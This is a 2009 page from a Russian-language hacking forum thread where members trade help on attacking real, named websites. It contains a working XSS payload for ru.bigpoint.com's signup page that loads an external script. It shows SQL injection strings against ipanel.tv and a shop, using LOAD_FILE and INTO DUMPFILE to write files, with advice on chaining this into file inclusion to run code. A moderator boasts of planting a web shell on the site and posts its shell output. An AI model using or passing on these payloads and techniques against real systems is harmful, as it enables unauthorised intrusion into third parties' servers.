Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    369
    Likes Received:
    92
    Reputations:
    5
    все значит из за глупости моей :), а можешь прям на этом примере показать как ее передать через адрес ? или POST так невыйдет
     
  2. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    в данном случае через адресную строку не передашь потому что метод передачи данных POST
     
  3. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Не согласен,в данном случаии(http://ru.bigpoint.com/signup/) переменные принимаються через REQUEST(ну или регистр глобалс) скорее всего, потому как пассивка на лицо:
     
    #8163 PaCo, 26 Jul 2009
    Last edited: 26 Jul 2009
  4. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    http://forum.antichat.ru/showpost.php?p=1389998&postcount=8135

    Актуально
     
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Pavlov, hex не поможет тут...
    Byrger, если ты и сможешь подделать IP, всеравно экранировка кавычки произойдет.
     
    #8165 mailbrush, 26 Jul 2009
    Last edited: 26 Jul 2009
  6. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.acumenin.com/index.php?p=../index.php

    Можно ли что нить придумать дальше? Не силен в инклюдах =(
     
  7. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    Можно.... Например записать в сессию пхп код... далее инклудить его.
    Поискать возможности заливки файла для дальнейшего инклуда и тд. и тп.
     
  8. JOHNik

    JOHNik Member

    Joined:
    21 Apr 2009
    Messages:
    51
    Likes Received:
    14
    Reputations:
    0
    Я вобще тут никакой сложности не вижу
    Code:
    http://ru.bigpoint.com/signup/?signUp=1&openId=&signUpUsername="><script src=http://www.site.ru/js.js></script>
    прекрасно работает! :)
     
    1 person likes this.
  9. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Всем здрасти...
    Есть скул
    При попытке проверить ее таким способом 10-1 (должна вывестить 9 новость)
    Выводится 10 новость... Значит наврятли можно чего сделать, при попытке подставить ковычку это лезет:

    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+1,2,3,4,5,6,7,8--' and pd.products_id = ''+union+select+1,2,3,4,5,6' at line 1

    Выплеск запроса(оставил важное токо):where p.products_id = ''+union+select+1,2,3,4,5,6--' and pd.products_id = ''+union+select+1,2,3,4,5,6--' and pd.language_id = '2'

    (1,2,3,4... мое, пробывал подобрать)(запрос был таким, id='+union+select+1,2,3,4,5,6--)

    При заменне плюсеков на пробелы вылазиет след. ошибка:

    1109 - Unknown table 'pd' in field list

    (значит внедрение запроса по идее возможно)

    Как тут быть? Скул в локалке. Пробывал разные комменты (--,/*, -- ) но не помогает
     
  10. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Может быть int();
    Или жёсткая фильтрация.
    Скорее всего 2.
     
  11. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    какой сложности?для тех кто в танке: я писал о том почему алерт вылазит,и предположил что данные принимаются постом.
    но Пако капнул дальше и построив опрделеннный запрос опредилил что данные принимаются через REQUEST(ну или регистр глобалс).
     
  12. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Ты же сохранил в /tmp/phpinfo.php
    А читаешь /tmp/phpinfo :)
     
  13. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    я всё правильно делал,просто описался. ты хоть сам бы по пробовал залить прежде чем писать.
     
  14. Flair

    Flair Member

    Joined:
    7 May 2009
    Messages:
    36
    Likes Received:
    13
    Reputations:
    9
    какая связка сплоитов щас актуальней?
     
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    nub-hacker
    Code:
    потом
    
    пытаюсь открыть
    
    http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/tmp/phpinfo.php'),3,4,5,6,7,8,9--
    
    нифига не раб. помогите плиз.
    
    почему не работает, как раз всё прекрасно в папку tmp залилось, что можнно проверить, пройдя по твоей последней ссылке:
    Code:
    http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/tmp/phpinfo.php'),3,4,5,6,7,8,9--
    
    посмотреть сорцы страницы, CTRL+F "<?", и ты увидишь там свой "<?phpinfo();?>"

    Просто сначала ты писал "читалка", а потом почему-то ждешь исполнения того, что загрузил. На самом деле через SQL-inj то, что загрузил - то просто сможешь также ПРОЧИТАТЬ.

    Чтобы файло, загруженное через скулю заработало, его (файло) надо загружать в папку, доступную из веба (т.е. чтобы можно было набрать к нему путь в адресной строке браузера), но для этого необходимы 2 условия:

    1. Знать полный абсолютный путь к серверу (а не просто /tmp, которая просто является фактическим тестом рабочести load_file). Папка "/tmp"Не всегда бывает доступна на запись, что часто многих начинающих сбивает с толку и они бросают такие скули.

    2. Папка должна быть доступна на запись

    ЗЫЖ Ну или как ты, в /tmp, но потом искать LFI, чтобы из этой /tmp проинклудить (читай - выполнить) твой phpinfo.php
     
    #8175 Pashkela, 28 Jul 2009
    Last edited: 28 Jul 2009
    2 people like this.
  16. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    :O мой пост и мою скуль крутишь ;)

    1)load_file - это чтение исходного кода файла
    2)+into+DUMPFILE+'/tmp/phpinfo.php'-- что бы это использовать надо иметь тебе инклуд
     
    _________________________
  17. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Pashkela, спасибо огромное, что так подробно разяснил. буду искать путь в web.

    HAXTA4OK,спс за скулю. побольше бы рутовских ;)
     
  18. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    P.S. вот тока ща зашел в эту тему прочел послед ваши посты и уже залил туда шелл
    если не жалко то закройте тему с этой скулей :)

    P.S.S

    за 3 минуты мой рекорд :D нашел и путь и залил шелл

    uid=48(apache) gid=48(apache) groups=48(apache) context=root:system_r:initrc_t права taM
     
    _________________________
    #8178 HAXTA4OK, 28 Jul 2009
    Last edited: 28 Jul 2009
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Нельзя так... Если ты успел - сразу закрывать, да?
     
  20. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10

    Давай путь. не жмись. мне в падлу Пашкелкин брутер путей юзать.
     
    #8180 nub-hacker, 28 Jul 2009
    Last edited: 28 Jul 2009
Thread Status:
Not open for further replies.